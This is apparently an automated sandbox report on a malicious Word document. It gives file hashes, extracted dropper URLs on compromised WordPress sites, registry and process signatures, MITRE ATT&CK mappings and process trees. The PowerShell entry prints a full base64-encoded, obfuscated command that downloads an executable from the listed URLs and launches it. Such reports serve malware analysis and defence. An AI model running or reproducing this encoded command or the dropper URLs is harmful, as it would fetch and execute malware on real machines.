cb10354a6aff051fe7ae1c2cfb38b40e5ed1c8fd1a4c4b1a35724efed4885995

General

Target

cb10354a6aff051fe7ae1c2cfb38b40e5ed1c8fd1a4c4b1a35724efed4885995.doc
Size

241KB
MD5

270f03e3d9fef36f88e51dd5dfec47c1
SHA1

79874b79923b7ea19a4d5caa9c8512767e9a4285
SHA256

cb10354a6aff051fe7ae1c2cfb38b40e5ed1c8fd1a4c4b1a35724efed4885995
SHA512

53c2fac1ef4b5f70eb0a77ff0359e226fabd533e2828b97f90ab4aa1f8a35572fffb7be07efb3775abf9df7ad67539890912429b7a75b901a711264b28ef90d4

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://nanettecook.org/wp-admin/x/

exe.dropper

http://scalarmonitoring.com/wp-admin/js/widgets/S0A/

exe.dropper

https://fourseasonsjsc.com/wp-admin/hzu9vvt/

exe.dropper

https://ningyangseo.com/wp-admin/am/

exe.dropper

https://www.rapidcarwash.net/wp-content/nO6U/

exe.dropper

http://coolchacult.com/wp-includes/i/

exe.dropper

http://anpbodysculpting.com/wp-content/themes/twentytwenty/c/

exe.dropper

https://lamajesteindustries.com/wp-content/DRTujMR/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

POwersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1628	3548	POwersheLL.exe

Blacklisted process makes network request 2 IoCs

Processes:

POwersheLL.exe

flow pid process

15 1628 POwersheLL.exe
16 1628 POwersheLL.exe
Executes dropped EXE 1 IoCs

Processes:

T14e00.exe

pid process

2260 T14e00.exe

flow	pid	process
15	1628	POwersheLL.exe
16	1628	POwersheLL.exe

pid	process
2260	T14e00.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

3980 WINWORD.EXE
3980 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

POwersheLL.exe

pid process

1628 POwersheLL.exe
1628 POwersheLL.exe
1628 POwersheLL.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

POwersheLL.exe

description pid process

Token: SeDebugPrivilege 1628 POwersheLL.exe
Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

WINWORD.EXET14e00.exe

pid process

3980 WINWORD.EXE
3980 WINWORD.EXE
3980 WINWORD.EXE
3980 WINWORD.EXE
3980 WINWORD.EXE
3980 WINWORD.EXE
3980 WINWORD.EXE
2260 T14e00.exe

pid	process
3980	WINWORD.EXE
3980	WINWORD.EXE

pid	process
1628	POwersheLL.exe
1628	POwersheLL.exe
1628	POwersheLL.exe

description	pid	process
Token: SeDebugPrivilege	1628	POwersheLL.exe

pid	process
3980	WINWORD.EXE
3980	WINWORD.EXE
3980	WINWORD.EXE
3980	WINWORD.EXE
3980	WINWORD.EXE
3980	WINWORD.EXE
3980	WINWORD.EXE
2260	T14e00.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cb10354a6aff051fe7ae1c2cfb38b40e5ed1c8fd1a4c4b1a35724efed4885995.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3980

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD cwBFAHQALQBJAHQARQBNACAAdgBhAHIASQBBAEIATABlADoATgA1ADkATwBtACAAIAAoACAAWwB0AFkAcABFAF0AKAAiAHsAMQB9AHsANAB9AHsAMAB9AHsAMgB9AHsAMwB9AHsANQB9ACIALQBGACAAJwBtAC4ASQAnACwAJwBTAHkAJwAsACcAbwAuAGQAaQAnACwAJwByAGUAYwB0AG8AUgAnACwAJwBTAFQAZQAnACwAJwBZACcAKQApACAAOwAgACAAcwBFAFQAIAAoACcAeAAyACcAKwAnAGkAJwApACAAKABbAHQAWQBwAEUAXQAoACIAewA1AH0AewA0AH0AewAzAH0AewAxAH0AewAyAH0AewAwAH0AewA2AH0AIgAgAC0AZgAgACcAQQAnACwAJwBJAGMARQBwAE8ASQAnACwAJwBuAHQATQAnACwAJwBWACcALAAnAHIAJwAsACcAUwBZAHMAdABlAE0ALgBuAEUAVAAuAHMARQAnACwAJwBuAEEARwBlAFIAJwApACAAKQAgADsAIAAgACQAUgB1AHMAdgBjAHgAdgA9ACgAJwBVAGwAJwArACgAJwAxACcAKwAnAHAAMgBwADAAJwApACkAOwAkAEsAMAB1AGwAcABuAGUAPQAkAFQAMAAwADMAOAByAGcAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAOQA2AG0AawBmADgAOwAkAFoAdwB4ADYANgB0ADAAPQAoACgAJwBJADkAZgAnACsAJwB2ACcAKQArACgAJwB4ACcAKwAnADAAaAAnACkAKQA7ACAAIAAoACAAIABnAEUAdAAtAFYAQQBSAEkAYQBiAGwARQAgACAATgA1ADkATwBNACAALQB2AGEAbAB1AGUATwBuAGwAeQApADoAOgAiAEMAYABSAGUAQQBUAGAARQBEAEkAcgBlAGAAYwBgAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAG0AJwArACcAdAB6AEQAOAAnACsAJwBjADkAOABuACcAKQArACcAbgAnACsAKAAnAG0AdAB6AE8AcwAnACsAJwBzACcAKQArACcAMAAnACsAKAAnADgAYgBfACcAKwAnAG0AdAB6ACcAKQApAC0AcgBlAFAATABBAEMARQAgACAAKABbAEMASABhAFIAXQAxADAAOQArAFsAQwBIAGEAUgBdADEAMQA2ACsAWwBDAEgAYQBSAF0AMQAyADIAKQAsAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE8AZwBoADkAZABpAGMAPQAoACcASgBoACcAKwAoACcAcABmADMAJwArACcAaQAnACkAKwAnADYAJwApADsAIAAgACgAIABWAEEAcgBpAEEAYgBMAEUAIAAgACgAJwBYADIAJwArACcAaQAnACkAIAAtAFYAYQBsAFUAZQApADoAOgAiAHMAYABlAEMAYABVAFIAaQB0AHkAYABwAFIATwBUAE8AQwBPAGwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAEsAbQBxAGUANABkAHIAPQAoACcAWgBxACcAKwAoACcAcQAnACsAJwAwAG0AdgAnACkAKwAnAHkAJwApADsAJABSADcAXwBjAHkAMABwACAAPQAgACgAJwBUACcAKwAoACcAMQA0ACcAKwAnAGUAJwApACsAJwAwADAAJwApADsAJABUAHUAcAByAHgAZQA1AD0AKAAoACcAQgAnACsAJwBjAHIAJwApACsAKAAnAGcAJwArACcAawBzAGMAJwApACkAOwAkAEwAegAwADAAeAA0AGQAPQAoACcAVQAnACsAKAAnAHUAZwBwACcAKwAnAGIAcQAyACcAKQApADsAJABZADcAZQBkAG4AbAAyAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ARAAnACsAKAAnADgAJwArACcAYwA5ACcAKQArACcAOABuAG4AewAnACsAJwAwAH0ATwBzACcAKwAnAHMAMAA4AGIAXwB7ACcAKwAnADAAfQAnACkALQBGACAAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFIANwBfAGMAeQAwAHAAKwAoACgAJwAuACcAKwAnAGUAeAAnACkAKwAnAGUAJwApADsAJABMAGMAegB2AG4AeAA1AD0AKAAnAEUAMQAnACsAJwBuADgAJwArACgAJwA2ACcAKwAnAHAAbgAnACkAKQA7ACQAWgBnAGwAYQA1AGEAcgA9AC4AKAAnAG4AZQB3AC0AbwBiAGoAJwArACcAZQBjACcAKwAnAHQAJwApACAAbgBlAFQALgBXAGUAQgBjAEwASQBlAE4AVAA7ACQARwBsADYAZwA1ADcAZQA9ACgAKAAoACgAJwBoAHQAdABwACcAKwAnADoAXQBbACAAJwArACcAKAAwACcAKwAnACAAaAAnACsAJwB1ACcAKwAnAEIASgAgAFsAXQAgACcAKwAnAFsAXQB3AF0AJwArACcAWwAgACgAJwArACcAMAAgAGgAJwArACcAdQBCAEoAIABbACcAKwAnAF0AJwArACcAIABbAF0AdwBuAGEAbgBlAHQAJwArACcAdAAnACsAJwBlAGMAbwBvACcAKQApACsAKAAoACcAawAuAG8AcgBnACcAKwAnAF0AWwAnACsAJwAgACgAJwArACcAMAAnACsAJwAgAGgAdQAnACsAJwBCAEoAIAAnACsAJwBbAF0AJwArACcAIABbAF0AdwB3AHAALQBhACcAKwAnAGQAbQBpAG4AJwArACcAXQAnACsAJwBbACAAKAAnACsAJwAwACAAaAAnACsAJwB1AEIAJwArACcASgAgAFsAJwArACcAXQAgAFsAJwArACcAXQB3AHgAJwArACcAXQBbACAAKAAwACAAaAAnACsAJwB1AEIASgAnACsAJwAgAFsAXQAgAFsAXQB3AEAAaAAnACsAJwB0AHQAJwArACcAcAA6ACcAKwAnAF0AWwAgACgAMAAnACkAKQArACgAJwAgAGgAdQBCAEoAIABbACcAKwAnAF0AIABbACcAKwAnAF0AJwApACsAKAAoACcAdwBdAFsAIAAoADAAIABoAHUAJwArACcAQgBKACAAWwAnACsAJwBdACcAKwAnACAAJwArACcAWwBdACcAKwAnAHcAcwBjACcAKwAnAGEAbABhAHIAbQAnACkAKQArACgAKAAnAG8AbgBpAHQAbwByAGkAbgBnACcAKwAnAC4AJwArACcAYwAnACsAJwBvAG0AJwArACcAXQBbACAAKAAwACcAKwAnACAAJwArACcAaAAnACsAJwB1AEIASgAgACcAKwAnAFsAXQAnACsAJwAgAFsAXQAnACsAJwB3ACcAKwAnAHcAcAAtACcAKwAnAGEAZABtAGkAJwArACcAbgAnACsAJwBdAFsAJwArACcAIAAoADAAIABoAHUAJwArACcAQgBKACAAWwBdACAAWwBdAHcAagBzAF0AJwArACcAWwAnACsAJwAgACgAMAAgAGgAdQBCAEoAIABbAF0AJwArACcAIAAnACsAJwBbAF0AdwAnACsAJwB3AGkAZAAnACsAJwBnAGUAJwApACkAKwAoACgAJwB0AHMAJwArACcAXQAnACsAJwBbACAAKAAwACAAaAB1AEIASgAgAFsAJwArACcAXQAgAFsAXQB3ACcAKQApACsAKAAoACcAUwAwAEEAXQAnACsAJwBbACcAKwAnACAAKAAnACkAKQArACgAKAAnADAAJwArACcAIABoAHUAQgAnACsAJwBKACcAKwAnACAAWwBdACAAWwBdAHcAQABoAHQAdAAnACsAJwBwAHMAOgBdAFsAJwArACcAIAAoADAAJwArACcAIABoAHUAJwArACcAQgBKACcAKwAnACAAWwBdACAAWwBdAHcAJwArACcAXQBbACAAJwArACcAKAAnACsAJwAwACAAaAB1ACcAKwAnAEIAJwArACcASgAgAFsAJwArACcAXQAgAFsAJwArACcAXQAnACsAJwB3AGYAbwB1AHIAcwBlAGEAcwBvAG4AJwArACcAcwBqACcAKwAnAHMAYwAnACsAJwAuACcAKwAnAGMAbwAnACsAJwBtAF0AJwArACcAWwAgACgAMAAgACcAKwAnAGgAJwApACkAKwAoACcAdQBCAEoAIAAnACsAJwBbACcAKQArACgAKAAnAF0AJwArACcAIABbAF0AdwB3AHAALQBhACcAKwAnAGQAbQBpACcAKwAnAG4AXQBbACAAKAAwACAAaAAnACsAJwB1AEIAJwArACcASgAgACcAKQApACsAKAAnAFsAXQAgAFsAJwArACcAXQB3AGgAJwArACcAegB1ACcAKwAnADkAdgB2AHQAJwApACsAKAAoACcAXQBbACAAJwArACcAKAAwACAAaAAnACkAKQArACgAJwB1AEIASgAgAFsAXQAgAFsAXQB3ACcAKwAnAEAAJwArACcAaAAnACkAKwAoACcAdAB0ACcAKwAnAHAAJwApACsAKAAoACcAcwA6AF0AJwArACcAWwAnACsAJwAgACgAMAAgAGgAdQAnACsAJwBCAEoAIABbACcAKwAnAF0AJwArACcAIABbAF0AdwAnACsAJwBdAFsAJwApACkAKwAoACgAJwAgACgAJwArACcAMAAgAGgAdQBCAEoAIABbAF0AIABbACcAKwAnAF0AdwAnACsAJwBuAGkAbgBnAHkAYQBuACcAKwAnAGcAcwBlAG8ALgBjAG8AJwArACcAbQAnACsAJwBdACcAKwAnAFsAJwArACcAIAAoADAAJwArACcAIABoAHUAQgAnACsAJwBKACcAKwAnACAAWwBdACAAWwBdACcAKwAnAHcAdwBwAC0AYQAnACsAJwBkAG0AaQAnACsAJwBuAF0AWwAnACsAJwAgACgAMAAgAGgAJwArACcAdQBCAEoAIABbAF0AIABbAF0AdwBhACcAKwAnAG0AXQBbACAAKAAnACsAJwAwACAAJwArACcAaAAnACsAJwB1AEIASgAgAFsAJwArACcAXQAgAFsAXQB3AEAAJwArACcAaAB0AHQAcAAnACsAJwBzADoAXQBbACAAKAAwACcAKwAnACAAaAB1AEIASgAnACsAJwAgAFsAXQAgAFsAXQAnACsAJwB3AF0AJwArACcAWwAgACcAKwAnACgAMAAgACcAKwAnAGgAdQBCAEoAIABbACcAKQApACsAKAAnAF0AJwArACcAIABbACcAKwAnAF0AdwB3ACcAKwAnAHcAJwArACcAdwAuACcAKwAnAHIAYQBwAGkAZABjAGEAcgB3AGEAJwApACsAKAAnAHMAJwArACcAaAAuACcAKQArACgAKAAnAG4AJwArACcAZQB0AF0AWwAgACcAKwAnACgAMAAgAGgAdQBCACcAKwAnAEoAJwArACcAIABbAF0AJwArACcAIABbAF0AdwB3AHAALQBjAG8AbgB0AGUAbgAnACsAJwB0AF0AWwAgACgAMAAgAGgAdQBCAEoAIABbAF0AIABbACcAKwAnAF0AdwBuAE8ANgBVAF0AJwArACcAWwAgACgAMAAgAGgAdQBCAEoAIAAnACsAJwBbAF0AIABbACcAKwAnAF0AdwAnACsAJwBAAGgAJwArACcAdAB0AHAAOgAnACkAKQArACgAKAAnAF0AJwArACcAWwAnACsAJwAgACgAMAAgACcAKwAnAGgAJwArACcAdQAnACsAJwBCACcAKwAnAEoAIABbACcAKwAnAF0AIABbAF0AdwBdAFsAIAAoADAAIABoAHUAQgBKACcAKwAnACAAWwBdACcAKwAnACAAWwBdACcAKQApACsAKAAnAHcAJwArACcAYwBvACcAKwAnAG8AbABjAGgAJwApACsAKAAoACcAYQBjAHUAbAB0AC4AYwBvAG0AXQBbACcAKwAnACAAKAAwACAAaAAnACsAJwB1ACcAKwAnAEIAJwArACcASgAgAFsAXQAgAFsAXQB3AHcAcAAnACkAKQArACgAKAAnAC0AaQAnACsAJwBuAGMAbAB1ACcAKwAnAGQAZQBzACcAKwAnAF0AWwAnACsAJwAgACgAMAAgAGgAdQAnACsAJwBCACcAKwAnAEoAIABbAF0AIAAnACsAJwBbACcAKwAnAF0AdwBpACcAKwAnAF0AJwArACcAWwAgACgAMAAgAGgAJwArACcAdQBCAEoAIAAnACsAJwBbAF0AIABbAF0AJwApACkAKwAoACgAJwB3AEAAaAB0AHQAcAAnACsAJwA6ACcAKwAnAF0AWwAgACcAKwAnACgAMAAgACcAKQApACsAKAAnAGgAdQAnACsAJwBCAEoAIABbAF0AJwArACcAIAAnACsAJwBbAF0AdwBdACcAKQArACgAKAAnAFsAJwArACcAIAAoADAAIABoAHUAQgBKACAAJwArACcAWwBdACAAWwBdACcAKwAnAHcAYQBuAHAAYgAnACsAJwBvACcAKQApACsAJwBkACcAKwAoACgAJwB5AHMAJwArACcAYwB1AGwAJwArACcAcAB0AGkAbgBnAC4AYwBvACcAKwAnAG0AXQBbACcAKwAnACAAJwArACcAKAAwACcAKQApACsAKAAoACcAIABoACcAKwAnAHUAQgBKACcAKwAnACAAWwAnACsAJwBdACAAWwBdAHcAdwBwAC0AYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AdABdAFsAIAAoACcAKwAnADAAIABoAHUAQgBKACAAWwBdACAAWwBdAHcAJwArACcAdABoAGUAbQBlAHMAJwArACcAXQBbACAAKAAwACAAJwArACcAaAB1AEIASgAgAFsAXQAgAFsAXQB3AHQAdwBlACcAKwAnAG4AJwArACcAdAB5AHQAJwArACcAdwBlAG4AdAB5AF0AWwAgACgAMAAgAGgAJwArACcAdQAnACsAJwBCAEoAIABbAF0AIABbACcAKQApACsAKAAoACcAXQAnACsAJwB3AGMAJwArACcAXQAnACsAJwBbACAAJwArACcAKAAwACAAaAB1AEIASgAgAFsAJwArACcAXQAgAFsAXQB3AEAAaAB0AHQAcABzADoAXQBbACAAJwArACcAKAAwACcAKwAnACAAaAAnACsAJwB1ACcAKQApACsAKAAoACcAQgAnACsAJwBKACAAJwArACcAWwBdACAAWwBdAHcAXQBbACAAKAAwACcAKwAnACAAaAB1AEIASgAgACcAKwAnAFsAXQAnACsAJwAgAFsAXQB3ACcAKwAnAGwAYQBtAGEAagBlAHMAJwArACcAdABlAGkAbgBkAHUAcwB0ACcAKQApACsAKAAoACcAcgBpACcAKwAnAGUAJwArACcAcwAuACcAKwAnAGMAbwBtACcAKwAnAF0AWwAgACgAMAAgAGgAdQBCAEoAIABbAF0AIABbAF0AdwB3AHAAJwArACcALQBjAG8AJwArACcAbgB0AGUAJwArACcAbgB0AF0AWwAnACsAJwAgACgAMAAgAGgAdQBCACcAKwAnAEoAJwArACcAIABbAF0AIABbAF0AJwArACcAdwBEAFIAVAAnACsAJwB1ACcAKwAnAGoATQBSAF0AJwArACcAWwAgACgAMAAnACsAJwAgACcAKwAnAGgAdQBCAEoAIABbACcAKQApACsAKAAnAF0AIABbAF0AJwArACcAdwAnACkAKQApAC4AIgBSAGUAcABMAEEAYABjAEUAIgAoACgAKAAnAF0AWwAnACsAKAAoACcAIAAoACcAKQApACsAJwAwACcAKwAoACcAIABoAHUAJwArACcAQgBKACAAJwArACcAWwBdACcAKQArACgAJwAgACcAKwAnAFsAXQAnACkAKwAnAHcAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAHgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAFMAYABQAGwASQBUACIAKAAkAFIAbgBuAHAAXwBfAHgAIAArACAAJABLADAAdQBsAHAAbgBlACAAKwAgACQATQB0AHoAZAA5AHAAegApADsAJABJADMAMQBoADQAcwBfAD0AKAAoACcAVwA2ACcAKwAnADQAOQAnACkAKwAnAHAAZwAnACsAJwBiACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWABkAHgAZgBkADAAYgAgAGkAbgAgACQARwBsADYAZwA1ADcAZQApAHsAdAByAHkAewAkAFoAZwBsAGEANQBhAHIALgAiAGQATwBXAE4ATABgAE8AYQBEAEYASQBgAEwAZQAiACgAJABYAGQAeABmAGQAMABiACwAIAAkAFkANwBlAGQAbgBsADIAKQA7ACQARgByADIAeQBkAGwAMgA9ACgAKAAnAEwAMwBkACcAKwAnADYAOQAyACcAKQArACcAZwAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAWQA3AGUAZABuAGwAMgApAC4AIgBMAGAAZQBuAGcAYABUAEgAIgAgAC0AZwBlACAANAA1ADAAMAAyACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACcAdwAnACsAJwBpAG4AJwArACcAMwAnACsAKAAnADIAJwArACcAXwBQAHIAbwAnACkAKwAoACcAYwBlAHMAJwArACcAcwAnACkAKQApAC4AIgBDAFIAYABFAEEAVABlACIAKAAkAFkANwBlAGQAbgBsADIAKQA7ACQAVAB2AGQAegBmADgAZwA9ACgAKAAnAE8AdQAnACsAJwBlACcAKQArACcAaAB6ACcAKwAnAHQAawAnACkAOwBiAHIAZQBhAGsAOwAkAEkANwByAHkAYQB1AGEAPQAoACcARwAnACsAKAAnADIAYgAnACsAJwBvAGUANwAnACkAKwAnAGUAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABCADcAegB3ADAAeQBiAD0AKAAoACcATwAnACsAJwBrAHQAMwAnACkAKwAnAHcAJwArACcAagAyACcAKQA=
1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628

C:\Users\Admin\D8c98nn\Oss08b_\T14e00.exe
C:\Users\Admin\D8c98nn\Oss08b_\T14e00.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2260

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\D8c98nn\Oss08b_\T14e00.exe
MD5
6671fa4366ca0baf6873286cf0192345

SHA1
4e55892a5cc2a6aae6f4ca89e291672f7d8c4b80

SHA256
0d56ec55e8ef45cc6cb5e0c49100f09493b1d6aacd69e774af8ea0e7c9ea5ec9

SHA512
2fe09b1fff8295649b770d60916ef4050ac0312f49046583b4bc1a62b2e5480659ca350e23dda53438fcd5eefb58106b31bab29a14e132a016a48168df912a12

Download Submit
C:\Users\Admin\D8c98nn\Oss08b_\T14e00.exe
MD5
6671fa4366ca0baf6873286cf0192345

SHA1
4e55892a5cc2a6aae6f4ca89e291672f7d8c4b80

SHA256
0d56ec55e8ef45cc6cb5e0c49100f09493b1d6aacd69e774af8ea0e7c9ea5ec9

SHA512
2fe09b1fff8295649b770d60916ef4050ac0312f49046583b4bc1a62b2e5480659ca350e23dda53438fcd5eefb58106b31bab29a14e132a016a48168df912a12

Download Submit
memory/1628-8-0x00007FF8D4420000-0x00007FF8D4E0C000-memory.dmp

Filesize
9.9MB

Download
memory/1628-9-0x0000018874E00000-0x0000018874E01000-memory.dmp

Filesize
4KB

Download
memory/1628-10-0x0000018875180000-0x0000018875181000-memory.dmp

Filesize
4KB

Download
memory/3980-0-0x00007FF8DBB00000-0x00007FF8DC137000-memory.dmp

Filesize
6.2MB

Download
memory/3980-4-0x00000292DCDD8000-0x00000292DCDDD000-memory.dmp

Filesize
20KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads